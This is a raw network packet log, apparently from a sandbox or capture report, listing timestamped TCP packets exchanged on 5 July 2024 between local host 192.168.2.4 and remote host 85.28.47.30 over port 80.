                                                                Jul 5, 2024 04:36:05.011451006 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.011461973 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.011462927 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.011475086 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.011498928 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.011523008 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.011594057 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.011641026 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.011643887 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.011656046 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.011665106 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.011693954 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.011713028 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.011984110 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.012034893 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.012130022 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.012181997 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.012267113 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.012317896 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.012787104 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.012831926 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.013550997 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.013607025 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.013696909 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.013748884 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.013840914 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.013853073 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.013897896 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.014297962 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.014347076 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.014442921 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.014492989 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.014676094 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.014738083 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.014983892 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.014993906 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.015002966 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.015013933 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.015024900 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.015034914 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.015036106 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.015049934 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.015060902 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.015062094 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.015072107 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.015084028 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.015084982 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.015095949 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.015105009 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.015106916 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.015131950 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.015151024 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.015151024 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.015165091 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.015176058 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.015186071 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.015188932 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.015202045 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.015213966 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.015218019 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.015225887 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.015238047 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.015243053 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.015249968 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.015253067 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.015260935 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.015274048 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.015280008 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.015286922 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.015295982 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.015304089 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.015311956 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.015352964 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.021430969 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.021488905 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.021593094 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.021603107 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.021611929 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.021622896 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.021632910 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.021642923 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.021651030 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.021660089 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.021672964 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.021684885 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.021693945 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.021716118 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.021749020 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.021759987 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.021795034 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.021936893 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.021946907 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.021958113 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.021986961 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.022001028 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.022083044 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.022094965 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.022104025 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.022118092 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.022129059 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.022135019 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.022140026 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.022150040 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.022159100 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.022173882 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.022201061 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.022207022 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.022252083 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.022392035 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.022402048 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.022413015 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.022420883 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.022432089 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.022444963 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.022478104 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.022543907 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.022555113 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.022586107 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.022602081 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.022686005 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.022696018 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.022706985 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.022716999 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.022727966 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.022737980 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.022744894 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.022749901 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.022772074 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.022788048 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.093498945 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.093508959 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.093519926 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.093566895 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.093569994 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.093586922 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.093606949 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.093616962 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.093619108 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.093633890 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.093645096 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.093647957 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.093663931 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.093679905 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.093689919 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.102427006 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.102473021 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.102482080 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.102485895 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.102514029 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.102526903 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.102533102 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.102545977 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.102556944 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.102574110 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.102586985 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.102686882 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.102698088 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.102708101 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.102739096 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.102754116 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.102767944 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.102777958 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.102787018 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.102816105 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.102838993 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.102839947 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.102852106 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.102870941 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.102880955 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.102881908 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.102894068 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.102905989 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.102916956 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.102948904 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.102965117 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.103037119 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.103049040 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.103060007 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.103070974 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.103085041 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.103086948 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.103100061 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.103108883 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.103116989 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.103128910 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.103152990 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.103176117 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.103225946 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.103245020 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.103255987 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.103291988 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.103323936 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.103333950 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.103349924 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.103360891 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.103369951 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.103372097 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.103383064 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.103384018 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.103414059 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.103461981 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.103502989 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.103507042 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.103514910 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.103553057 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.103584051 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.103595018 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.103604078 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.103612900 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.103632927 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.103646994 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.103668928 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.103693008 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.103718042 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.103729010 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.103738070 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.103750944 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.103770971 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.103801012 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.103812933 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.103821993 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.103832006 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.103843927 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.103852034 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.103879929 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.141838074 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.146624088 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.321665049 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.321680069 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.321691990 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.321723938 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.321729898 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.321742058 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.321753025 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.321757078 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.321765900 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.321784973 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.321785927 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.321798086 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.321805954 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.321810961 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.321816921 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.321834087 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.321846008 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.321850061 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.321861029 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.321871042 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.321901083 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.322011948 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.322022915 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.322033882 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.322052956 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.322055101 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.322069883 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.322082996 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.322082996 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.322098017 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.322110891 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.322110891 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.322124958 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.322153091 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.322221041 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.322232962 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.322242975 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.322267056 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.322268963 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.322278976 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.322283983 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.322292089 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.322304010 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.322316885 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.322319984 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.322330952 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.322340012 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.322367907 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.322376966 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.322444916 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.322457075 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.322468042 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.322489977 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.322514057 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.322519064 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.322525978 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.322539091 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.322557926 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.322580099 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.322618008 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.322629929 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.322639942 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.322653055 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.322659969 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.322665930 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.322679043 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.322683096 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.322711945 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.322725058 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.322745085 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.322757006 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.322767973 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.322778940 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.322793007 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.322819948 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.322830915 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.322833061 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.322845936 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.322860003 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.322887897 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.323076963 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.323120117 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.323121071 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.323132038 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.323163033 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.323175907 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.323203087 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.323213100 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.323224068 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.323240995 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.323246002 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.323270082 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.323296070 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.323328018 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.323338985 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.323348999 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.323359966 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.323365927 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.323371887 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.323385000 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.323390961 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.323395967 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.323409081 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.323419094 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.323438883 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.323452950 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.323477983 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.323488951 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.323498964 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.323510885 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.323522091 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.323523998 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.323551893 CEST4973080192.168.2.485.28.47.30
